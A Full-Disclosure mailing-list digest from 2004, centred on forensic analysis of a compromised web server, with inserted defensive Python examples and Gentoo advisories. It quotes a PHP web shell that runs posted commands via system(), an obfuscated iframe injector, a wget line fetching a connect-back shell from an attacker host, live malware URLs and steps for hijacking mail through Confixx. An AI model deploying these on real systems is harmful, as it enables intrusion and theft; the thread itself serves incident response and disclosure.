[Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorioedmaster.it)
Date: Sun Oct 24 2004 - 06:47:04 CDT


Hi list,
I'm doing some analysis on a Linux-Mandrake 9.0 web server
belonging to a person who was compromised in October.
This host now has a special trojan installed that inserts a
malicious <IFRAME> tag into every served .PHP page.

The host is running these services:

Port 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
Port 22: SSH-1.99-OpenSSH_3.4p1
Port 25: 220 XXXXX ESMTP 5.5.1
Port 110: +OK <XXXXXXXXXX>
Port 3306: MySQL 3.23.52
Ports 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
Linux/6mdk)
sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3

I've found in the Apache log that the hacker broke into the machine
using an overflow and injected an executable /tmp/a.out via "qmail-inject".
These are the suspicious log lines:

[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
fault (11)
[Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
fault (11)
[Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
fault (11)
[Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
fault (11)
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
<angdimaryahoo.it>
[Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
fault (11)
[Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
fault (11)
[Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
fault (11)
qmail-inject: fatal: unable to parse this line:
To: Drugo:Lebowskilibero.it
sh: -c: option requires an argument
--15:50:07-- http://xpire.info/cli.gz
           => `/tmp/a.out'
Resolving xpire.info... fatto.
Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
inviata, aspetto la risposta... 200 OK
Lunghezza: 19,147 [text/plain]

    0K .......... ........ 100% 9.97K

15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]

[Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
fault (11)
[Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
fault (11)

Trying a wget of http://xpire.info/cli.gz, I get an ELF executable for
Linux, possibly containing a connect-back shell. Inside this ELF file you
can grep these strings:

Usage: %s host port
 pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
fork pty, bye!
 Fuck you so
 /bin/sh No connect
 Looking up %s... Failed!
 OK
 %u Connect Back

I don't know if the hacker installed a rootkit on this machine, but checking
the md5sums of the ls, lsof, ps and netstat binaries against the ones from a
clean Mandrake distribution came out fine.

The main problem is finding how the Apache server (or PHP) was altered by
the hacker, because every user that connects to this host now could be
infected by several recent HTML/IE exploits.
Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
random way??) the web server inserts a special javascript between the
HTTP header and the served page.
The script is:

<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,
40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,
119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,105,110,
102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,116,61,49,
32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,41))
</script>

Decoding it, I see that it writes an <IFRAME> tag into the page pointing
to this url:

<iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
width=1></iframe>

If you surf to this page (don't do this if you use IE or are not patched)
you could get infected by several exploits, because it opens a lot of
<iframe>s pointing to different domains.

I want to list these domains here, because they are sources
for exploit studying:

Domain: www.sp2fucked.biz
http://69.50.168.147/user28/counter.htm

Found MHTMLRedir.Exploit
http://213.159.117.133/dl/adv121.php

http://195.178.160.30/js.php?cust=28

http://195.178.160.30/ifr.php?cust=89

http://69.50.168.147/user28/exploit.htm

Found Java class exploit
http://69.50.168.147/user28/exploit2.htm

My questions are:

1) how can I remove this injected Javascript/IFRAME? I've checked
httpd.conf and a lot of PHP pages, but I haven't found anything..... Is it
possible that the hacker installed some compromised Apache module, or so?

2) does anyone know these sites (xpire.info or splitinfinity.info) from before?
Why are they still online and serving trojans/exploits to surfers' browsers?
xpire.info is related to "Mike Fox"..... but it sounds like a fake John Doe
registration!

      Domain ID: D5946452-LRMS
      Domain Name: XPIRE.INFO
      Created On: 23-May-2004 19:41:15 UTC
      Last Updated On: 02-Aug-2004 08:07:20 UTC
      Expiration Date: 23-May-2005 19:41:15 UTC
      Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com
(R159-LRMS)
      Status: ACTIVE
      Status: OK
      Registrant ID: C4752858-LRMS
      Registrant Name: Mike Fox
      Registrant Organization: n/a
      Registrant Street1: Hali-gali, 77
      Registrant City: Deli
      Registrant Postal Code: 12345
      Registrant Country: IN
      Registrant Phone: +91.226370256
      Registrant Email: c8idkvtgarwinidkvt38yahoo.com

3) how can I tell if a rootkit was installed???

Thanks to anyone for replies

EF
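
The decoding step Elia did by hand is worth automating, because this kind of injector tends to change the character-code payload between visits and the thing you need out of it (the iframe target) is the same each time. The script below is an added example, not part of Elia's post. Its sample input is the script quoted above, kept in the form it reaches an analyst by mail, wrapped at about 72 columns with numbers cut in half at the line breaks, so the first step joins the lines before parsing; the regexes are the example's own.

```python
"""Decode an eval(String.fromCharCode(...)) injection.

Added example, not from the post. The sample is the script quoted in the
post, kept in the form it reaches an analyst by mail: wrapped at ~72
columns with numbers split across line breaks, so the first step is to
join the lines before parsing. Output is the decoded JavaScript and the
iframe target(s) it writes.
"""
import re

INJECTED_SCRIPT = """<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
41))
</script>"""

FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([\d,\s]+?)\s*\)")
IFRAME_SRC = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def unwrap(text):
    """Re-join mail-wrapped lines; a newline never belongs inside a JS token here."""
    return "".join(line.strip() for line in text.splitlines())


def decode_fromcharcode(script):
    """Decoded string for every String.fromCharCode(...) call, in order."""
    decoded = []
    for m in FROMCHARCODE.finditer(unwrap(script)):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def iframe_targets(script):
    """URLs of iframes the decoded layer(s) write into the page."""
    urls = []
    for layer in decode_fromcharcode(script):
        urls.extend(IFRAME_SRC.findall(layer))
    return urls


if __name__ == "__main__":
    for layer in decode_fromcharcode(INJECTED_SCRIPT):
        print(layer)
    print("iframe targets:", iframe_targets(INJECTED_SCRIPT))
```

Run it over a raw HTTP response captured with the sniffer rather than over the PHP source: the post notes the injection appears between the header and the page only sometimes, which is consistent with something in the serving path rather than in the files, so the captured response is the evidence to keep.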

 
Re: [Full-Disclosure] Help, possible rootkit

From: Ali Campbell (fdisclosurealicampbell.org.uk)
Date: Sun Oct 24 2004 - 08:59:45 CDT


BillyBob wrote:

> Any more suggestions ?

I have seen something similar to this behaviour caused by a flaky power
connector in a Si3112 mirrored RAID array.

Ali

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: devis (deviseasynix.net)
Date: Sun Oct 24 2004 - 09:26:25 CDT


Well, it's the good old trick <string>.<good known extension>[ insert
numerous spaces here ].<nasty executable extension>

This relies on MS IExplore or Outlook not showing more than X characters
of the file name, but as your screenshots show, it's detected as a
screen saver, meaning it has a .scr extension, which happens to be
executable as well.

$ file details/details.txt\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ .scr
MS-DOS executable (EXE), OS/2 or MS Windows

Does that trick Hotmail / McAfee every time?
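
The file(1) output above gives the two independent signals a mail gateway should check: the name (the extension Windows acts on is the one after the last dot, the one a truncated display shows is the one after the first, and the padding between them is the tell) and the content (a Windows executable begins with the "MZ" DOS header, which is what file(1) reported as "MS-DOS executable"). The classifier below is an added example, not code from the post; its sample name and header bytes are constructed to match the attachment described.

```python
"""Spot the "name.txt<lots of spaces>.scr" attachment trick.

Added example, not from the post. Two independent signals: the name (the
extension the OS acts on is after the LAST dot; the one a truncated
display shows is after the FIRST; padding between them is the tell) and
the content (a Windows executable starts with the "MZ" DOS header, which
is what file(1) reported). The sample name and header bytes are constructed.
"""
import re

# Extensions Windows executes directly; extend to taste.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "vbe",
                   "js", "jse", "wsf", "wsh", "hta", "cpl", "lnk"}


def real_extension(filename):
    """What the shell uses: text after the last dot, whitespace stripped, lowercased."""
    name = filename.strip()
    if "." not in name:
        return ""
    return name.rsplit(".", 1)[1].strip().lower()


def apparent_extension(filename):
    """What a user sees if the name is cut off: text after the first dot up to whitespace."""
    m = re.match(r"[^.]*\.([^.\s]+)", filename)
    return m.group(1).lower() if m else ""


def padding_before_last_extension(filename):
    """Number of whitespace characters immediately before the final '.ext'."""
    m = re.search(r"(\s+)\.[^.\s]+\s*$", filename)
    return len(m.group(1)) if m else 0


def classify(filename, content_head=b""):
    """Combine name and content checks; content_head is the first bytes of the attachment."""
    real = real_extension(filename)
    shown = apparent_extension(filename)
    padding = padding_before_last_extension(filename)
    mz = content_head.startswith(b"MZ")
    return {
        "real_ext": real,
        "shown_ext": shown,
        "padding": padding,
        "executable_ext": real in EXECUTABLE_EXTS,
        # executable extension hidden behind padding or a harmless-looking earlier extension
        "disguised_name": real in EXECUTABLE_EXTS and (padding > 0 or shown != real),
        "mz_header": mz,
        # executable content behind a non-executable claimed type is the strongest signal
        "content_mismatch": mz and shown not in EXECUTABLE_EXTS,
    }


# Constructed sample matching the post: details.txt + 120 spaces + .scr, PE content.
SAMPLE_NAME = "details.txt" + " " * 120 + ".scr"
SAMPLE_HEAD = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"

if __name__ == "__main__":
    for name, head in [(SAMPLE_NAME, SAMPLE_HEAD), ("report.pdf.exe", b""),
                       ("notes.txt", b"plain text")]:
        print(repr(name[:20]), classify(name, head))
```

The content check is the one to trust: a gateway that only inspects names will pass a renamed executable, and one that only inspects names after truncating them is exactly what this trick targets.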

 
[Full-Disclosure] [ GLSA 200410-22 ] MySQL: Multiple vulnerabilities

From: Thierry Carrez (koongentoo.org)
Date: Sun Oct 24 2004 - 09:29:45 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: MySQL: Multiple vulnerabilities
      Date: October 24, 2004
      Bugs: #67062
        ID: 200410-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Several vulnerabilities including privilege abuse, Denial of Service,
and potentially remote arbitrary code execution have been discovered
in MySQL.

Background
==========

MySQL is a popular open-source, multi-threaded, multi-user SQL database
server.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 dev-db/mysql < 4.0.21 >= 4.0.21

Description
===========

The following vulnerabilities were found and fixed in MySQL:

Oleksandr Byelkin found that ALTER TABLE ... RENAME checks
CREATE/INSERT rights of the old table instead of the new one
(CAN-2004-0835). Another privilege checking bug allowed users to grant
rights on a database they had no rights on.

Dean Ellis found a defect where multiple threads ALTERing the MERGE
tables to change the UNION could cause the server to crash
(CAN-2004-0837). Another crash was found in MATCH ... AGAINST() queries
with missing closing double quote.

Finally, a buffer overrun in the mysql_real_connect function was found
by Lukasz Wojtow (CAN-2004-0836).

Impact
======

The privilege checking issues could be used by remote users to bypass
their rights on databases. The two crash issues could be exploited by
a remote user to perform a Denial of Service attack on the MySQL server.
The buffer overrun issue could also be exploited as a Denial of Service
attack, and may allow execution of arbitrary code with the rights of the
MySQL daemon (typically, the "mysql" user).

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MySQL users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=dev-db/mysql-4.0.21"
    # emerge ">=dev-db/mysql-4.0.21"

References
==========

  [ 1 ] CAN-2004-0835
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0835
  [ 2 ] CAN-2004-0836
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0836
  [ 3 ] CAN-2004-0837
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0837
  [ 4 ] Privilege granting bug
        http://bugs.mysql.com/bug.php?id=3933
  [ 5 ] MATCH ... AGAINST crash bug
        http://bugs.mysql.com/bug.php?id=3870

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Bruno Wolff III (brunowolff.to)
Date: Sun Oct 24 2004 - 09:31:30 CDT


On Fri, Oct 22, 2004 at 17:48:26 +0000,
  Ali Campbell <fdisclosurealicampbell.org.uk> wrote:
>
> I need a Linux utility which I can use to encrypt a single gzipped file
> via the command line. Obviously something open source would be
> preferable. I'm not really interested in setting up a whole suite of
> stuff with keyfiles and so on, and I don't need a public/private key
> setup, just something quick and dirty with a single secret key for
> encryption and decryption which is nevertheless reasonably strong.

If you are only automating encryption and not decryption and not signing
for integrity, you should probably reconsider using public keys since
that way you don't have to make a password available to your script.

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: bowwownowhere.org
Date: Sun Oct 24 2004 - 08:18:05 CDT


Ahhhh.......checkout too
http://lists.netsys.com/pipermail/full-disclosure/2004-October/027350.html

 
[Full-Disclosure] confixx e-mail bug

From: Igor Buchmueller (bugtraqint80h.de)
Date: Sun Oct 24 2004 - 10:28:12 CDT


Hello,

I noticed a bug in Confixx. Confixx is a software to administrate websites.
Nice features are to create customers or reseller customers and give them
tools to administer their own websites.

It is possible, as a normal user, to catch all e-mails which are going from the
server to domain foo.bar:

1. Create a customer in your Confixx. This can be done without root
permissions on the server; you will just need a reseller account. In the
process of creating a normal customer, you will need to assign him/her a
domain.

2. Assign yahoo.com, hotmail.com or gmx.de to your customer.

3. Log into your customer's account in Confixx and create a wildcard e-mail
address for your domain.

Now, all e-mails from this Confixx server will be delivered to your customer's
account.

This worked for me, any comments?

with best regards, Igor

--
mfG, Igor B.
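
The three steps above amount to one missing check: the panel lets a reseller claim a domain without any evidence of owning it, and once a domain is in the locally-hosted list the MTA delivers its mail on the box. The snippet below is an added example and not Confixx code; it makes no claim about how Confixx implements assignment internally. It shows the unchecked form beside a hardened one that refuses well-known public mail domains, refuses domains another customer already holds, and requires the domain's MX to point at this server unless an administrator approves. The server name, the MX answers and the fake resolver are constructed so it runs offline.

```python
"""Domain assignment in a shared-hosting panel: the unchecked form beside a
hardened one.

Added example; this is not Confixx code and makes no claim about how
Confixx implements the check internally. The vulnerable path accepts any
domain a reseller types, so mail for it is then routed locally. The hardened
path refuses well-known public mail domains, refuses domains already hosted
by someone else, and requires the domain's MX to already point at this
server unless an administrator approves. The MX data and server name below
are constructed.
"""

# Domains from the post; in practice use a maintained list of public providers.
PUBLIC_MAIL_DOMAINS = {"yahoo.com", "hotmail.com", "gmx.de"}

# Assumption: the hostname this panel's mail server answers to in MX records.
THIS_SERVER_MX = {"mail.example-hoster.net"}

# Constructed DNS answers so the example runs offline.
CONSTRUCTED_MX = {
    "yahoo.com": ["mx1.mail.yahoo.com"],
    "customer-site.example": ["mail.example-hoster.net"],
    "not-mine.example": ["mx.elsewhere.example"],
}


def fake_lookup_mx(domain):
    """Stand-in for a real MX query; returns the constructed answers above."""
    return CONSTRUCTED_MX.get(domain, [])


def assign_domain_vulnerable(customer, domain, hosted):
    """The flaw as reported: any domain is accepted and becomes locally hosted."""
    hosted[domain.lower()] = customer
    return True


def assign_domain_hardened(customer, domain, hosted, lookup_mx, admin_approved=False):
    """Return (ok, reason). Only 'ok' assignments change `hosted`."""
    domain = domain.strip().lower().rstrip(".")
    if not domain or "." not in domain:
        return False, "not a valid domain name"
    if domain in PUBLIC_MAIL_DOMAINS:
        return False, "public mail provider domain"
    if hosted.get(domain, customer) != customer:
        return False, "domain already hosted by another customer"
    if not (set(lookup_mx(domain)) & THIS_SERVER_MX) and not admin_approved:
        return False, "MX does not point at this server; needs admin approval"
    hosted[domain] = customer
    return True, "ok"


def delivers_locally(domain, hosted):
    """What the MTA consults: is mail for this domain delivered on this box?"""
    return domain.lower() in hosted


if __name__ == "__main__":
    weak, strong = {}, {}
    assign_domain_vulnerable("reseller1", "yahoo.com", weak)
    print("vulnerable: local delivery for yahoo.com?", delivers_locally("yahoo.com", weak))
    for dom in ["yahoo.com", "not-mine.example", "customer-site.example"]:
        print("hardened:", dom, assign_domain_hardened("reseller1", dom, strong, fake_lookup_mx))
    print("hardened: local delivery for yahoo.com?", delivers_locally("yahoo.com", strong))
```

The MX requirement is a bootstrapping problem for genuinely new customers, which is why the example keeps an admin-approval path; the deny list of public providers is the cheap check that closes the case Igor describes regardless.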

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Kevin (KKadowgmail.com)
Date: Sun Oct 24 2004 - 13:01:08 CDT


On Sun, 24 Oct 2004 13:47:04 +0200, Elia Florio <eflorioedmaster.it> wrote:
> Hi list,
> i'm doing some analysis on a Linux-Mandrake 9.0 web server
> of a person that was compromised in October.
> On this host a special trojan is now installed that inserts a
> malicious <IFRAME> tag into every served .PHP page.
. . .
> I've found inside the Apache log that the hacker broke into the machine
> using an overflow and injecting an executable /tmp/a.out via "qmail-inject".

I'm not sure that qmail-inject isn't a red herring? The actual
download looks like 'wget' was used.

> These are the suspicious log lines :
>
> [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
> fault (11)
> [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
> fault (11)
> [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
> fault (11)
> [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
> <angdimaryahoo.it>
> [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
> fault (11)
> [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
> fault (11)
> [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowskilibero.it
> sh: -c: option requires an argument
> --15:50:07-- http://xpire.info/cli.gz
> => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
> inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
>
> 0K .......... ........ 100% 9.97K
>
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
>
> [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
> fault (11)
> [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
> fault (11)
>
> Trying a WGET of http://xpire.info/cli.gz, I get an ELF executable for
> Linux,
> possibly containing a ConnectBack shell. Inside this ELF file you can grep
> these strings:
>
> Usage: %s host port
> pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
> Fuck you so
> /bin/sh No connect
> Looking up %s... Failed!
> OK
> %u Connect Back
>
> I don't know if the hacker installed a rootkit on this machine, but the check
> of the md5sums of
> the ls, lsof, ps, netstat binaries against the ones from a clean Mandrake distr.
> was good.......

I assume you used a bootable CD on the infected machine to do the checksums?

> The main problem is finding how the Apache server (or PHP) was altered by
> the hacker,
> because every user that connects to this host now could be infected by
> several recent HTML/IE exploits.

Check the httpd.conf (and other apache configuration files) for any
changes, and also the contents of each module loaded. It's also
possible, but less likely, that the injection is done in a kernel
module.

> Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
> random way??)
> the web server inserts a special javascript between the HTTP header and the served page.

Sounds like a good time to replace the entire server with a fresh build.

Kevin



 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorioedmaster.it)
Date: Sun Oct 24 2004 - 14:06:51 CDT


> I'm not sure that qmail-inject isn't a red herring? The actual
> download looks like 'wget' was used.
Good suggestion, my friend :)

WGET was used to retrieve the http://xpire.info/cli.gz connectback shell.
After further analysis I've found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here is the log captured by Apache:

----------------------------------------------------------------------------
----
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28-- http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........ 100% 20.04
KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
------------------------------------------------------------------------

If you compare the output, you can see that in the log I showed first the stdout
was in Italian (because the compromised server is .it), while in this case it is
in English.
The hacker launched the WGET command to retrieve his hacking tool into /tmp/a.out.
In this log you can also see that the hacker tried to execute some "ls"
commands,
as a first trial to test the vulnerability, I suppose.
Prompted by this, after further analysis I found that the vulnerability used is an
obvious-but-effective PHP injection
using global variables (http://www.securityfocus.com/archive/1/218000 is a
good page to learn
something about this vuln).

The page the hacker used to accomplish the injection is based on this
test page, taken directly from the hacker site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojans/backdoors/shells/worms/exploits and
other malware....why is it still open?

http://xpire.info/cli.gz // connect back shell
http://xpire.info/fa/aga.exe // agobot family
http://xpire.info/install.gz // some trojan/malware ???? my NortonAV
does not catch it; it's a Windows-EXE

This is the sample of PHP-Injection page:
<?
// Two fixed commands whose output tells the attacker the page is alive
$OS = system('uname -a');
$X = system('ls -la /usr/bin/X11/X');
echo "<OS>".$OS."</OS><br>";
echo "<X>".$X."</X>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<pre>
<xmp>
<? // $lox is populated directly from the POST field by register_globals ?>
<?=system($lox);?>
</xmp>
</pre>
Using the PHP "system" call, it is possible to execute any command remotely,
WGET for example.
Did anyone know this page before???

> I assume you used a bootable CD on the infected machine to do the
checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely,
using SSH, so I cannot use a bootable CD on this remote host, which is very
far from me :)
I'm limited in the analysis.....but the host is not mine!
However I think that md5sum gives me good results, because I compared the whole
/usr/sbin directory
and all the checksums were good, except for /usr/sbin/crond......any ideas???
I also used the "rpm -Vf" utility to cross-check the results, and they were the
same as md5sum.

> Check the httpd.conf (and other apache configuration files) for any
> changes, and also the contents of each module loaded. It's also
> possilble, but less likely, that the injection is done in a kernel
> module.
It's my fear :(((((((((( I studied all *.conf files related to the Apache/PHP modules
of this
machine, but nothing was found. An injected LKM could be the only answer.

I also ran "chkrootkit" as someone suggested to me, but all the tests came
back clean
(no worm, no rootkit, no trojan)

> Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity begins :))))))

Thank you for the help, Kevin.

EF

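An added example, not code from this thread or from any of its posters: a small Python triage script for the kind of mixed Apache error_log shown above. It separates Apache's own timestamped notices from lines that a child process wrote to stderr (with a web shell like the one above, that is the attacker's commands talking), tags the segfaults, the "sh: -c" errors, the "ls" probes and the wget transfer, and pulls out the fetched URL and the drop path. The sample log is constructed from the quoted lines in the English locale; the Italian "salvato" variant from the first log is matched too.

```python
import re
from collections import Counter

# Constructed sample modelled on the error_log excerpts quoted in this thread
# (English locale); it is not the compromised server's actual log.
SAMPLE_ERROR_LOG = """\
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/include/sdk386: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
           => `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]
18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
[Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation fault (11)
"""

# Apache 1.3/2.0 error_log lines start with "[Day Mon dd hh:mm:ss yyyy] [level] ".
APACHE_LINE = re.compile(r"^\[[A-Z][a-z]{2} [A-Z][a-z]{2} +\d+ [\d:]+ \d{4}\] \[\w+\] ")

# Ordered rules; the first match wins.  A capture group, where present, is the
# value worth keeping (probed path, fetched URL, drop path).
RULES = [
    ("segfault",    re.compile(r"exit signal Segmentation fault")),
    ("shell_error", re.compile(r"^sh: .*-c")),                      # system() with empty arg
    ("recon_ls",    re.compile(r"^ls: (\S+): No such file or directory")),
    ("wget_fetch",  re.compile(r"^--[\d:]+--\s+(\S+://\S+)")),
    ("wget_dest",   re.compile(r"=> `([^']+)'")),
    ("wget_saved",  re.compile(r"`([^']+)' (?:saved|salvato) \[")),  # en / it locale
]


def triage_error_log(text):
    """Return [(line_no, tag, value)] for every line that is not a plain Apache notice."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for tag, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append((n, tag, m.group(1) if m.groups() else line.strip()))
                break
        else:
            # No rule matched: anything without an Apache timestamp still came
            # from a child's stderr and deserves a look.
            if line.strip() and not APACHE_LINE.match(line):
                findings.append((n, "foreign_stderr", line.strip()))
    return findings


def summarize(findings):
    """Counts per tag plus the URLs fetched and the paths written on disk."""
    counts = Counter(tag for _, tag, _ in findings)
    urls = sorted({v for _, tag, v in findings if tag == "wget_fetch"})
    drops = sorted({v for _, tag, v in findings if tag in ("wget_dest", "wget_saved")})
    return {"counts": dict(counts), "fetched_urls": urls, "dropped_files": drops}


if __name__ == "__main__":
    found = triage_error_log(SAMPLE_ERROR_LOG)
    for n, tag, value in found:
        print("%3d %-14s %s" % (n, tag, value))
    print(summarize(found))
```

Run it against a real error_log with `triage_error_log(open(path).read())`; the segfault count alone is a useful timeline of the exploitation attempts, and the dropped_files list gives the paths to pull for analysis before the box is rebuilt.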


 
[Full-Disclosure] [ GLSA 200410-23 ] Gaim: Multiple vulnerabilities

From: Matthias Geerdsen (vorlongentoo.org)
Date: Sun Oct 24 2004 - 14:11:17 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Gaim: Multiple vulnerabilities
      Date: October 24, 2004
      Bugs: #68271
        ID: 200410-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Gaim which could allow a
remote attacker to crash the application, or possibly execute
arbitrary code.

Background
==========

Gaim is a full featured instant messaging client which handles a variety
of instant messaging protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  net-im/gaim              < 1.0.2                        >= 1.0.2

Description
===========

A possible buffer overflow exists in the code processing MSN SLP
messages (CAN-2004-0891). memcpy() was used without validating the size
of the buffer, and an incorrect buffer was used as destination under
certain circumstances. Additionally, memory allocation problems were
